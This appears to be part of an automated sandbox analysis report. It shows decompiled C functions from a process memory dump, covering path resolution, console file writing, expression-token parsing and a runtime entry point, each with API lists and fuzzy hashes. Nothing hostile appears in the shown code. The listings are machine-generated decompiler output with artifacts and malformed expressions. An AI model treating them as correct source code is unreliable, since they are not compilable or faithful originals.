                                                      									if( *_t348 == 0x30) {
                                                      										_t260 =  *0x4a7540b4; // 0x0
                                                      										__eflags = _t260;
                                                      										if(_t260 != 0) {
                                                      											__eflags =  *((intOrPtr*)(_t260 + 0x8c)) - _t339;
                                                      											if( *((intOrPtr*)(_t260 + 0x8c)) == _t339) {
                                                      												__eflags =  *(_t367 - 0x838);
                                                      												if( *(_t367 - 0x838) == 0) {
                                                      													__eflags =  *(_t367 - 0x828) & 0x0000c000;
                                                      													if(( *(_t367 - 0x828) & 0x0000c000) != 0) {
                                                      														_t339 =  *_t260;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      									goto L26;
                                                      								}
                                                      								L20:
                                                      								__eflags = _t170 - 0x24;
                                                      								if(_t170 == 0x24) {
                                                      									L78:
                                                      									_t365 = _t348 + 2;
                                                      									 *(_t367 - 0x834) = _t365;
                                                      									_t348 = wcschr(_t365, 0x3a);
                                                      									_pop(_t294);
                                                      									__eflags = _t348;
                                                      									if(_t348 == 0) {
                                                      										goto L67;
                                                      									}
                                                      									L79:
                                                      									_t339 = (_t348 -  *(_t367 - 0x834) >> 1) + 1;
                                                      									_t288 = E4A731896(_t339 + _t339);
                                                      									__eflags = _t288;
                                                      									if(_t288 != 0) {
                                                      										L84:
                                                      										E4A734B3D(_t288, _t339,  *(_t367 - 0x834), _t339 - 1);
                                                      										 *(_t367 - 0x838) = E4A73321B(_t294, _t288);
                                                      										E4A73142E(_t288);
                                                      										__eflags =  *(_t367 - 0x838);
                                                      										if( *(_t367 - 0x838) == 0) {
                                                      											_t113 = _t367 - 0x838;
                                                      											 *_t113 =  *(_t367 - 0x838) | 0xffffffff;
                                                      											__eflags =  *_t113;
                                                      										}
                                                      										_t339 = wcsrchr;
                                                      										_t348 = _t348 + 2;
                                                      										 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008000;
                                                      										goto L22;
                                                      									}
                                                      									goto L80;
                                                      								}
                                                      								L21:
                                                      								_t268 =  *_t339( *((intOrPtr*)(_t367 - 0x840)), _t170);
                                                      								__eflags = _t268;
                                                      								if(_t268 == 0) {
                                                      									goto L63;
                                                      								}
                                                      								goto L22;
                                                      							}
                                                      						}
                                                      					}
                                                      					L81:
                                                      					goto L69;
                                                      				}
                                                      				L26:
                                                      				 *( *(_t367 - 0x84c)) = (_t348 -  *((intOrPtr*)(_t367 - 0x844)) + 2 >> 1) - 1;
                                                      				__eflags = _t339;
                                                      				if(_t339 == 0) {
                                                      					L4:
                                                      					__eflags =  *( *(_t367 - 0x84c));
                                                      					_t174 = E4A733AFC;
                                                      					if( *( *(_t367 - 0x84c)) == 0) {
                                                      						L2:
                                                      						_t174 = _t339;
                                                      					} else {
                                                      					}
                                                      					goto L3;
                                                      				}
                                                      				__eflags =  *_t339;
                                                      				if( *_t339 == 0) {
                                                      					L1:
                                                      					if(_t339 == 0) {
                                                      						goto L4;
                                                      					}
                                                      					goto L2;
                                                      				}
                                                      				__eflags =  *(_t367 - 0x828) & 0x0000c000;
                                                      				if(( *(_t367 - 0x828) & 0x0000c000) == 0) {
                                                      					_push(_t339);
                                                      					L49:
                                                      					_t339 = E4A7319D6();
                                                      					goto L1;
                                                      				}
                                                      				 *(_t367 - 0x824) = 0;
                                                      				__eflags =  *(_t367 - 0x838);
                                                      				if( *(_t367 - 0x838) != 0) {
                                                      					__eflags =  *(_t367 - 0x838) - 0xffffffff;
                                                      					if( *(_t367 - 0x838) == 0xffffffff) {
                                                      						L91:
                                                      						_t339 = 0;
                                                      						goto L31;
                                                      					}
                                                      					_t256 = SearchPathW( *(_t367 - 0x838), _t339, 0, 0x208, _t367 - 0x824, _t367 - 0x82c);
                                                      					 *(_t367 - 0x850) = _t256;
                                                      					__eflags = _t256;
                                                      					if(_t256 == 0) {
                                                      						goto L91;
                                                      					}
                                                      					__eflags =  *(_t367 - 0x828);
                                                      					if( *(_t367 - 0x828) == 0) {
                                                      						 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008001;
                                                      					}
                                                      					goto L31;
                                                      				} else {
                                                      					 *(_t367 - 0x850) = GetFullPathNameW(_t339, 0x208, _t367 - 0x824, _t367 - 0x82c);
                                                      					L31:
                                                      					 *(_t367 - 0x834) =  *(_t367 - 0x828) & 0x00000020;
                                                      					E4A736E47(_t367 - 0x824, 0x208,  *(_t367 - 0x828) & 0x00000020);
                                                      					_t188 = wcsrchr(_t367 - 0x824, 0x5c);
                                                      					 *(_t367 - 0x82c) = _t188;
                                                      					__eflags = _t188;
                                                      					if(_t188 == 0) {
                                                      						 *(_t367 - 0x82c) = wcsrchr(_t367 - 0x824, _t188);
                                                      					} else {
                                                      						_t29 = _t367 - 0x82c;
                                                      						 *_t29 =  &(( *(_t367 - 0x82c))[0]);
                                                      						__eflags =  *_t29;
                                                      					}
                                                      					__eflags =  *(_t367 - 0x850);
                                                      					if( *(_t367 - 0x850) == 0) {
                                                      						goto L1;
                                                      					} else {
                                                      						 *(_t367 - 0x414) = 0;
                                                      						memset(_t367 - 0x412, 0, 0x40e);
                                                      						_t195 =  *(_t367 - 0x828) & 0x00004000;
                                                      						__eflags = _t195;
                                                      						_t357 = _t367 - 0x414;
                                                      						 *(_t367 - 0x83c) = _t195;
                                                      						_t341 = 0x207;
                                                      						if(_t195 != 0) {
                                                      							_t198 = GetFileAttributesExW(_t367 - 0x824, 0, _t367 - 0x878);
                                                      							__eflags = _t198;
                                                      							if(_t198 == 0) {
                                                      								goto L35;
                                                      							}
                                                      							__eflags =  *(_t367 - 0x828) & 0x00000100;
                                                      							if(( *(_t367 - 0x828) & 0x00000100) == 0) {
                                                      								L102:
                                                      								__eflags =  *(_t367 - 0x828) & 0x00000200;
                                                      								if(( *(_t367 - 0x828) & 0x00000200) != 0) {
                                                      									E4A742513(_t367 - 0x864, _t367 - 0x89c);
                                                      									__eflags = _t357 - _t367 - 0x414;
                                                      									if(_t357 != _t367 - 0x414) {
                                                      										__eflags = _t357 - _t367 - 0x414 >> 1 - _t341;
                                                      										if(_t357 - _t367 - 0x414 >> 1 < _t341) {
                                                      											_t252 = 0x20;
                                                      											 *_t357 = _t252;
                                                      											_t357 = _t357 + 2;
                                                      											__eflags = _t357;
                                                      										}
                                                      									}
                                                      									_t360 = _t357 + E4A74270D(_t367 - 0x89c, 0, _t357, 0x104 - (_t357 - _t367 - 0x414 >> 1)) * 2;
                                                      									__eflags = _t360 - _t367 - 0x414;
                                                      									if(_t360 != _t367 - 0x414) {
                                                      										__eflags = _t360 - _t367 - 0x414 >> 1 - 0x207;
                                                      										if(_t360 - _t367 - 0x414 >> 1 < 0x207) {
                                                      											_t248 = 0x20;
                                                      											 *_t360 = _t248;
                                                      											_t360 = _t360 + 2;
                                                      											__eflags = _t360;
                                                      										}
                                                      									}
                                                      									__eflags = 0x104 - (_t360 - _t367 - 0x414 >> 1);
                                                      									_t357 = _t360 + E4A73D701(_t360, _t367 - 0x89c, 0, _t360, 0x104 - (_t360 - _t367 - 0x414 >> 1)) * 2;
                                                      									_t341 = 0x207;
                                                      								}
                                                      								__eflags =  *(_t367 - 0x828) & 0x00000400;
                                                      								if(( *(_t367 - 0x828) & 0x00000400) != 0) {
                                                      									__eflags = _t357 - _t367 - 0x414;
                                                      									if(_t357 != _t367 - 0x414) {
                                                      										__eflags = _t357 - _t367 - 0x414 >> 1 - _t341;
                                                      										if(_t357 - _t367 - 0x414 >> 1 < _t341) {
                                                      											_t229 = 0x20;
                                                      											 *_t357 = _t229;
                                                      											_t357 = _t357 + 2;
                                                      											__eflags = _t357;
                                                      										}
                                                      									}
                                                      									 *((intOrPtr*)(_t367 - 0x854)) =  *((intOrPtr*)(_t367 - 0x858));
                                                      									 *(_t367 - 0x850) =  *(_t367 - 0x85c);
                                                      									_t357 = _t357 + E4A74292F(0, _t367 - 0x854, 0, _t357, 0x208 - (_t357 - _t367 - 0x414 >> 1)) * 2;
                                                      								}
                                                      								goto L35;
                                                      							}
                                                      							_t332 = 0;
                                                      							__eflags =  *0x4a77088c - _t332; // 0x64
                                                      							if(__eflags == 0) {
                                                      								goto L102;
                                                      							}
                                                      							_t253 = 0x4a77088c;
                                                      							while(1) {
                                                      								_t334 = _t332 >> 1;
                                                      								__eflags = _t332 >> 1 - _t341;
                                                      								if(_t332 >> 1 >= _t341) {
                                                      									goto L102;
                                                      								}
                                                      								_t336 =  *(_t367 - 0x878);
                                                      								__eflags =  *(_t253 - 4) & _t336;
                                                      								if(( *(_t253 - 4) & _t336) == 0) {
                                                      									_t334 = 0x2d;
                                                      								} else {
                                                      									_t334 =  *_t253;
                                                      								}
                                                      								 *_t357 = _t334;
                                                      								_t357 = _t357 + 2;
                                                      								_t253 = _t253 + 8;
                                                      								_t332 = _t332 + 2;
                                                      								__eflags =  *_t253;
                                                      								if( *_t253 != 0) {
                                                      									continue;
                                                      								} else {
                                                      									goto L102;
                                                      								}
                                                      							}
                                                      							goto L102;
                                                      						}
                                                      						L35:
                                                      						_t199 =  *(_t367 - 0x828);
                                                      						__eflags = _t199 & 0x00008000;
                                                      						if((_t199 & 0x00008000) == 0) {
                                                      							__eflags =  *(_t367 - 0x83c);
                                                      							if( *(_t367 - 0x83c) == 0) {
                                                      								goto L36;
                                                      							}
                                                      							L48:
                                                      							_push(_t367 - 0x414);
                                                      							goto L49;
                                                      						}
                                                      						L36:
                                                      						__eflags = _t357 - _t367 - 0x414;
                                                      						if(_t357 != _t367 - 0x414) {
                                                      							_t334 = _t367 - 0x414;
                                                      							__eflags = _t357 - _t367 - 0x414 >> 1 - _t341;
                                                      							if(_t357 - _t367 - 0x414 >> 1 < _t341) {
                                                      								_t321 = 0x20;
                                                      								 *_t357 = _t321;
                                                      								_t357 = _t357 + 2;
                                                      							}
                                                      						}
                                                      						__eflags = _t199 & 0x00000001;
                                                      						if((_t199 & 0x00000001) != 0) {
                                                      							L47:
                                                      							__eflags = 0x208 - (_t357 - _t367 - 0x414 >> 1);
                                                      							E4A73185A(_t357, 0x208 - (_t357 - _t367 - 0x414 >> 1), _t367 - 0x824);
                                                      							goto L48;
                                                      						} else {
                                                      							__eflags =  *(_t367 - 0x834);
                                                      							if( *(_t367 - 0x834) != 0) {
                                                      								__eflags = _t199 & 0x0000001e;
                                                      								if((_t199 & 0x0000001e) != 0) {
                                                      									goto L39;
                                                      								}
                                                      								goto L47;
                                                      							}
                                                      							L39:
                                                      							_t342 = _t367 - 0x820;
                                                      							__eflags = _t199 & 0x00000002;
                                                      							if((_t199 & 0x00000002) == 0) {
                                                      								E4A73185A(_t367 - 0x824, 0x208, _t342);
                                                      								_t48 = _t367 - 0x82c;
                                                      								 *_t48 =  *(_t367 - 0x82c) - 4;
                                                      								__eflags =  *_t48;
                                                      								_t342 = _t367 - 0x824;
                                                      							}
                                                      							__eflags =  *(_t367 - 0x828) & 0x00000004;
                                                      							if(( *(_t367 - 0x828) & 0x00000004) == 0) {
                                                      								__eflags = 0x208 - (_t342 - _t367 - 0x824 >> 1);
                                                      								E4A73185A(_t342, 0x208 - (_t342 - _t367 - 0x824 >> 1),  *(_t367 - 0x82c));
                                                      								 *(_t367 - 0x82c) = _t342;
                                                      							}
                                                      							_t206 = wcsrchr( *(_t367 - 0x82c), 0x2e);
                                                      							__eflags = _t206;
                                                      							if(_t206 == 0) {
                                                      								 *(_t367 - 0x83c) =  *(_t367 - 0x83c) & _t206;
                                                      								_t206 = _t367 - 0x83c;
                                                      							}
                                                      							__eflags =  *(_t367 - 0x828) & 0x00000010;
                                                      							if(( *(_t367 - 0x828) & 0x00000010) == 0) {
                                                      								__eflags = 0;
                                                      								 *_t206 = 0;
                                                      							}
                                                      							__eflags =  *(_t367 - 0x828) & 0x00000008;
                                                      							if(( *(_t367 - 0x828) & 0x00000008) == 0) {
                                                      								E4A73185A( *(_t367 - 0x82c), 0x208 - ( *(_t367 - 0x82c) - _t367 - 0x824 >> 1), _t206);
                                                      							}
                                                      							goto L47;
                                                      						}
                                                      					}
                                                      				}
                                                      			}
                                                      0x4a7351b4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7351b4
                                                      0x4a737725
                                                      0x4a73772b
                                                      0x4a73f3dc
                                                      0x4a7378d6
                                                      0x4a7378db
                                                      0x00000000
                                                      0x4a7378db
                                                      0x4a737733
                                                      0x4a73773f
                                                      0x4a737745
                                                      0x4a746cc3
                                                      0x4a746cca
                                                      0x4a746d10
                                                      0x4a746d10
                                                      0x00000000
                                                      0x4a746d10
                                                      0x4a746ce4
                                                      0x4a746cea
                                                      0x4a746cf0
                                                      0x4a746cf2
                                                      0x00000000
                                                      0x00000000
                                                      0x4a746cf4
                                                      0x4a746cfb
                                                      0x4a746d01
                                                      0x4a746d01
                                                      0x00000000
                                                      0x4a73774b
                                                      0x4a737761
                                                      0x4a737767
                                                      0x4a737771
                                                      0x4a73777f
                                                      0x4a737793
                                                      0x4a737797
                                                      0x4a73779d
                                                      0x4a73779f
                                                      0x4a746d23
                                                      0x4a7377a5
                                                      0x4a7377a5
                                                      0x4a7377a5
                                                      0x4a7377a5
                                                      0x4a7377a5
                                                      0x4a7377ac
                                                      0x4a7377b3
                                                      0x00000000
                                                      0x4a7377b9
                                                      0x4a7377c1
                                                      0x4a7377cf
                                                      0x4a7377dd
                                                      0x4a7377dd
                                                      0x4a7377e2
                                                      0x4a7377e8
                                                      0x4a7377ee
                                                      0x4a7377f3
                                                      0x4a746d3e
                                                      0x4a746d44
                                                      0x4a746d46
                                                      0x00000000
                                                      0x00000000
                                                      0x4a746d4c
                                                      0x4a746d56
                                                      0x4a746d93
                                                      0x4a746d93
                                                      0x4a746d9d
                                                      0x4a746db1
                                                      0x4a746dbc
                                                      0x4a746dbe
                                                      0x4a746dcc
                                                      0x4a746dce
                                                      0x4a746dd2
                                                      0x4a746dd3
                                                      0x4a746dd7
                                                      0x4a746dd7
                                                      0x4a746dd7
                                                      0x4a746dce
                                                      0x4a746dfd
                                                      0x4a746e06
                                                      0x4a746e08
                                                      0x4a746e16
                                                      0x4a746e1b
                                                      0x4a746e1f
                                                      0x4a746e20
                                                      0x4a746e24
                                                      0x4a746e24
                                                      0x4a746e24
                                                      0x4a746e1b
                                                      0x4a746e31
                                                      0x4a746e43
                                                      0x4a746e46
                                                      0x4a746e46
                                                      0x4a746e4b
                                                      0x4a746e55
                                                      0x4a746e61
                                                      0x4a746e63
                                                      0x4a746e71
                                                      0x4a746e73
                                                      0x4a746e77
                                                      0x4a746e78
                                                      0x4a746e7c
                                                      0x4a746e7c
                                                      0x4a746e7c
                                                      0x4a746e73
                                                      0x4a746e83
                                                      0x4a746e8f
                                                      0x4a746eb7
                                                      0x4a746eb7
                                                      0x00000000
                                                      0x4a746e55
                                                      0x4a746d58
                                                      0x4a746d5a
                                                      0x4a746d61
                                                      0x00000000
                                                      0x00000000
                                                      0x4a746d63
                                                      0x4a746d68
                                                      0x4a746d6a
                                                      0x4a746d6c
                                                      0x4a746d6e
                                                      0x00000000
                                                      0x00000000
                                                      0x4a746d70
                                                      0x4a746d76
                                                      0x4a746d79
                                                      0x4a746d82
                                                      0x4a746d7b
                                                      0x4a746d7b
                                                      0x4a746d7b
                                                      0x4a746d83
                                                      0x4a746d87
                                                      0x4a746d89
                                                      0x4a746d8c
                                                      0x4a746d8d
                                                      0x4a746d91
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a746d91
                                                      0x00000000
                                                      0x4a746d68
                                                      0x4a7377f9
                                                      0x4a7377f9
                                                      0x4a7377ff
                                                      0x4a737804
                                                      0x4a746ebf
                                                      0x4a746ec6
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7378cf
                                                      0x4a7378d5
                                                      0x00000000
                                                      0x4a7378d5
                                                      0x4a73780a
                                                      0x4a737810
                                                      0x4a737812
                                                      0x4a746ed3
                                                      0x4a746edd
                                                      0x4a746edf
                                                      0x4a746ee7
                                                      0x4a746ee8
                                                      0x4a746eec
                                                      0x4a746eec
                                                      0x4a746edf
                                                      0x4a737818
                                                      0x4a73781a
                                                      0x4a7378b3
                                                      0x4a7378c6
                                                      0x4a7378ca
                                                      0x00000000
                                                      0x4a737820
                                                      0x4a737820
                                                      0x4a737827
                                                      0x4a742389
                                                      0x4a74238b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a742391
                                                      0x4a73782d
                                                      0x4a73782d
                                                      0x4a737833
                                                      0x4a737835
                                                      0x4a737842
                                                      0x4a737847
                                                      0x4a737847
                                                      0x4a737847
                                                      0x4a73784e
                                                      0x4a73784e
                                                      0x4a737854
                                                      0x4a73785b
                                                      0x4a737871
                                                      0x4a737875
                                                      0x4a73787a
                                                      0x4a73787a
                                                      0x4a737888
                                                      0x4a737890
                                                      0x4a737892
                                                      0x4a73fea7
                                                      0x4a73fead
                                                      0x4a73fead
                                                      0x4a737898
                                                      0x4a73789f
                                                      0x4a7378a1
                                                      0x4a7378a3
                                                      0x4a7378a3
                                                      0x4a7378a6
                                                      0x4a7378ad
                                                      0x4a737977
                                                      0x4a737977
                                                      0x00000000
                                                      0x4a7378ad
                                                      0x4a73781a
                                                      0x4a7377b3

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: wcsrchr$FullNamePathmemset
                                                      • String ID:
                                                      • API String ID: 1865318540-0
                                                      • Opcode ID: 41b4674206260db18ef5d9fce353743b9b4c904a7edf03018bffec05c02af524
                                                      • Instruction ID: ed4aa6d6be97a6bb73c8af92786fee6929dae4a395e898e77074c1e0f3c167cc
                                                      • Opcode Fuzzy Hash: 41b4674206260db18ef5d9fce353743b9b4c904a7edf03018bffec05c02af524
                                                      • Instruction Fuzzy Hash: 90D196B1A185299ADF74CB24CD84BE97BF8FB44310F0181A9D589E6181DF719E88CFD4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 79%
                                                      			E4A73453E(void* __eax, void* _a4, short* _a8, long _a12, DWORD* _a16) {
                                                      				long _v8;
                                                      				long _v12;
                                                      				int _t27;
                                                      				long _t29;
                                                      				int _t34;
                                                      				void* _t36;
                                                      				DWORD* _t39;
                                                      				void* _t40;
                                                      				void* _t46;
                                                      				long _t47;
                                                      				long _t51;
                                                      				intOrPtr _t52;
                                                      
                                                      				_t47 = _a12;
                                                      				_v12 = _t47;
                                                      				__imp___get_osfhandle(_a4, _t46, _t36, _t40, _t40);
                                                      				_a4 = __eax;
                                                      				_t52 =  *0x4a770668; // 0x0
                                                      				if(_t52 != 0) {
                                                      					_t27 = WriteFile(__eax, _a8, _t47, _a16, 0);
                                                      				} else {
                                                      					while(_a12 > 0x2000) {
                                                      						_t29 = WideCharToMultiByte( *0x4a7541b8, 0, _a8, 0x1000, 0x4a756640, 0x2000, 0, 0);
                                                      						_a8 =  &(_a8[0x1000]);
                                                      						_a12 = _a12 - 0x2000;
                                                      						_v8 = _t29;
                                                      						if(WriteFile(_a4, 0x4a756640, _t29, _a16, 0) == 0) {
                                                      							L10:
                                                      							_t27 = 0;
                                                      							L7:
                                                      							goto L8;
                                                      						} else {
                                                      							if( *_a16 == _v8) {
                                                      								continue;
                                                      							} else {
                                                      								goto L10;
                                                      							}
                                                      						}
                                                      						L15:
                                                      					}
                                                      					if(_a12 == 0) {
                                                      						_t39 = _a16;
                                                      						goto L6;
                                                      					} else {
                                                      						_t34 = WideCharToMultiByte( *0x4a7541b8, 0, _a8, 0xffffffff, 0x4a756640, 0x2000, 0, 0);
                                                      						_t39 = _a16;
                                                      						_t51 = _t34 - 1;
                                                      						if(WriteFile(_a4, 0x4a756640, _t51, _t39, 0) == 0 ||  *_t39 != _t51) {
                                                      							goto L10;
                                                      						} else {
                                                      							L6:
                                                      							 *_t39 = _v12;
                                                      							_t27 = 1;
                                                      						}
                                                      					}
                                                      					goto L7;
                                                      				}
                                                      				L8:
                                                      				return _t27;
                                                      				goto L15;
                                                      			}
















                                                      APIs
                                                      • _get_osfhandle.MSVCRT ref: 4A734550
                                                      • WideCharToMultiByte.KERNEL32(00000000,?,000000FF,4A756640,00002000,00000000,00000000,00000001,?,?,4A73596D,00000001,?,?,?,00000001), ref: 4A73459B
                                                      • WriteFile.KERNEL32(?,4A756640,-00000001,4A744FE5,00000000), ref: 4A7345AE
                                                      • WriteFile.KERNEL32(00000000,?,?,4A744FE5,00000000), ref: 4A7486C2
                                                      • WideCharToMultiByte.KERNEL32(00000000,?,00001000,4A756640,00002000,00000000,00000000,00000001,?,?,4A73596D,00000001,?,?,?,00000001), ref: 4A7486E0
                                                      • WriteFile.KERNEL32(?,4A756640,00000000,4A744FE5,00000000), ref: 4A7486F8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                      • String ID: @fuJ
                                                      • API String ID: 3249344982-843781518
                                                      • Opcode ID: 909d7cc86fb2b08dcf7187e7ae157052eb52bd643672bc6f5fbe29f0d90aa200
                                                      • Instruction ID: c916e3ba072f71e0eeeae8328f04cdb91b83d6bbefa5dd4cceb59950af9661dd
                                                      • Opcode Fuzzy Hash: 909d7cc86fb2b08dcf7187e7ae157052eb52bd643672bc6f5fbe29f0d90aa200
                                                      • Instruction Fuzzy Hash: 4B316BB2505259BFEF318F91CC88C9B7FBDEB457A5B018165F915DA150D3308E54CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E4A73F176(signed short** _a4, signed short** _a8, signed short** _a12) {
                                                      				long _t15;
                                                      				long _t20;
                                                      				wchar_t* _t21;
                                                      				signed short** _t33;
                                                      
                                                      				_t33 = _a4;
                                                      				_t20 = E4A73F123(_t33) & 0x0000ffff;
                                                      				if(_t20 == 0 || iswdigit(_t20) != 0 || wcschr(L"<>+-*/%()|^&=,", _t20) != 0) {
                                                      					L12:
                                                      					return 0;
                                                      				} else {
                                                      					_t21 = L"+-~!";
                                                      					if(wcschr(_t21, _t20) != 0) {
                                                      						goto L12;
                                                      					}
                                                      					 *_a8 =  *_t33;
                                                      					while( *( *_t33) != 0) {
                                                      						_t15 =  *( *_t33) & 0x0000ffff;
                                                      						if(_t15 <= 0x20 || wcschr(_t21, _t15) != 0 || wcschr(L"<>+-*/%()|^&=,",  *( *_t33) & 0x0000ffff) != 0) {
                                                      							break;
                                                      						} else {
                                                      							 *_t33 =  &(( *_t33)[1]);
                                                      							continue;
                                                      						}
                                                      					}
                                                      					 *_a12 =  *_t33;
                                                      					return 1;
                                                      				}
                                                      			}








                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: wcschr$iswdigit
                                                      • String ID: +-~!$<>+-*/%()|^&=,
                                                      • API String ID: 2770779731-632268628
                                                      • Opcode ID: 801ac085567a9ad869b7979a462f12c24752f9b53cb6b3ab59ffc2670e5615b4
                                                      • Instruction ID: a4ecc3fef67f6bd132863bfe05e0e258c528ad0a52a4e1fce717fc16f741c246
                                                      • Opcode Fuzzy Hash: 801ac085567a9ad869b7979a462f12c24752f9b53cb6b3ab59ffc2670e5615b4
                                                      • Instruction Fuzzy Hash: 2811C47B60E717ABA3608B69EC909667BECFB412F57224026F611CB2C1EB34D805C764
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 64%
                                                      			_entry_(long __ebx, void* __edx, LONG* __edi, intOrPtr __esi, void* __eflags) {
                                                      				long _v8;
                                                      				intOrPtr* _v24;
                                                      				long _v32;
                                                      				intOrPtr _v36;
                                                      				void* _t10;
                                                      				int _t11;
                                                      				intOrPtr _t13;
                                                      				void* _t14;
                                                      				int _t15;
                                                      				intOrPtr* _t16;
                                                      				long _t21;
                                                      				intOrPtr _t22;
                                                      				intOrPtr _t23;
                                                      				void* _t26;
                                                      				intOrPtr _t28;
                                                      				long _t36;
                                                      				void* _t39;
                                                      				void* _t52;
                                                      				void* _t53;
                                                      
                                                      				_t35 = __esi;
                                                      				_t34 = __edi;
                                                      				_t24 = __ebx;
                                                      				0x9d3ed(_t39);
                                                      				if(__eflags >= 0) {
                                                      					L7:
                                                      					_t10 = E4A738271(0x4a738378, 0x4a738384);
                                                      					_pop(_t26);
                                                      					if(_t10 != 0) {
                                                      						_v8 = 0xfffffffe;
                                                      						_t11 = 0xff;
                                                      						goto L27;
                                                      					} else {
                                                      						goto L8;
                                                      					}
                                                      				} else {
                                                      					E4A73264A(__ebx, __edi, __esi);
                                                      					_t24 = 0;
                                                      					_v8 = 0;
                                                      					_t36 =  *( *[fs:0x18] + 4);
                                                      					_v32 = 0;
                                                      					_t34 = 0x4a754204;
                                                      					while(1) {
                                                      						_t21 = InterlockedCompareExchange(_t34, _t36, _t24);
                                                      						if(_t21 == _t24) {
                                                      							break;
                                                      						}
                                                      						__eflags = _t21 - _t36;
                                                      						if(__eflags != 0) {
                                                      							Sleep(0x3e8);
                                                      							continue;
                                                      						} else {
                                                      							_t35 = 1;
                                                      							_v32 = 1;
                                                      						}
                                                      						L4:
                                                      						_t22 =  *0x4a754200; // 0x0
                                                      						if(_t22 == _t35) {
                                                      							L4A752309();
                                                      							_t26 = 0x1f;
                                                      							goto L8;
                                                      						} else {
                                                      							_t23 =  *0x4a754200; // 0x0
                                                      							if(_t23 != 0) {
                                                      								 *0x4a77090c = _t35;
                                                      								L8:
                                                      								_t13 =  *0x4a754200; // 0x0
                                                      								if(_t13 == _t35) {
                                                      									_push(0x4a738374);
                                                      									L4A737C76();
                                                      									_t26 = 0x4a73836c;
                                                      									 *0x4a754200 = 2;
                                                      								}
                                                      								if(_v32 == _t24) {
                                                      									InterlockedExchange(_t34, _t24);
                                                      								}
                                                      								_t52 =  *0x4a770688 - _t24; // 0x0
                                                      								if(_t52 != 0) {
                                                      									_t14 = E4A75227C(_t24, _t34, _t35, __eflags);
                                                      									_t26 = 0x4a770688;
                                                      									__eflags = _t14;
                                                      									if(_t14 != 0) {
                                                      										 *0x4a770688(_t24, 2, _t24);
                                                      									}
                                                      								}
                                                      								_push( *0x4a75423c);
                                                      								_push( *0x4a754240);
                                                      								_push( *0x4a754238);
                                                      								_t15 = L4A737308(_t26, _t34, _t35);
                                                      								 *0x4a754274 = _t15;
                                                      								_t53 =  *0x4a754138 - _t24; // 0x0
                                                      								if(_t53 != 0) {
                                                      									__eflags =  *0x4a77090c - _t24; // 0x0
                                                      									if(__eflags == 0) {
                                                      										__imp___cexit();
                                                      									}
                                                      									_v8 = 0xfffffffe;
                                                      									_t11 =  *0x4a754274; // 0x0
                                                      									L27:
                                                      									return E4A7313B6(_t11);
                                                      								} else {
                                                      									exit(_t15);
                                                      									_t16 = _v24;
                                                      									_t28 =  *((intOrPtr*)( *_t16));
                                                      									_v36 = _t28;
                                                      									_push(_t16);
                                                      									_push(_t28);
                                                      									L4A7521EE();
                                                      									return _t16;
                                                      								}
                                                      							} else {
                                                      								 *0x4a754200 = _t35;
                                                      								goto L7;
                                                      							}
                                                      						}
                                                      						goto L28;
                                                      					}
                                                      					_t35 = 1;
                                                      					goto L4;
                                                      				}
                                                      				L28:
                                                      			}























                                                      APIs
                                                      • InterlockedCompareExchange.KERNEL32(4A754204,?,00000000), ref: 4A7382C4
                                                      • _initterm.MSVCRT ref: 4A73831D
                                                      • InterlockedExchange.KERNEL32 ref: 4A738335
                                                      • exit.MSVCRT ref: 4A738414
                                                      • _XcptFilter.MSVCRT ref: 4A738426
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: ExchangeInterlocked$CompareFilterXcpt_inittermexit
                                                      • String ID:
                                                      • API String ID: 1199863589-0
                                                      • Opcode ID: fcf103d25aef381c8427b79cb5044402c28480a1972236de9d99c12e4fa36acc
                                                      • Instruction ID: 652f2b2ff33ee9b0201e2c9e946ce4e449dbc2a4a9cfb4357ea7c1918ce68496
                                                      • Opcode Fuzzy Hash: fcf103d25aef381c8427b79cb5044402c28480a1972236de9d99c12e4fa36acc
                                                      • Instruction Fuzzy Hash: 2C3124F584DA25EFEBB08FA4D88A95D3B7CFB41720B124069E101DAE42D7385C08CB55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • _get_osfhandle.MSVCRT ref: 4A74F47C
                                                      • FlushFileBuffers.KERNEL32(00000000), ref: 4A74F480
                                                        • Part of subcall function 4A733AB3: _close.MSVCRT ref: 4A733AED
                                                      • _get_osfhandle.MSVCRT ref: 4A74F4C6
                                                      • SetFilePointer.KERNEL32(00000000), ref: 4A74F4CA
                                                      • _get_osfhandle.MSVCRT ref: 4A74F4DC
                                                      • ReadFile.KERNEL32(00000000), ref: 4A74F4E0
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: File_get_osfhandle$BuffersFlushPointerRead_close
                                                      • String ID:
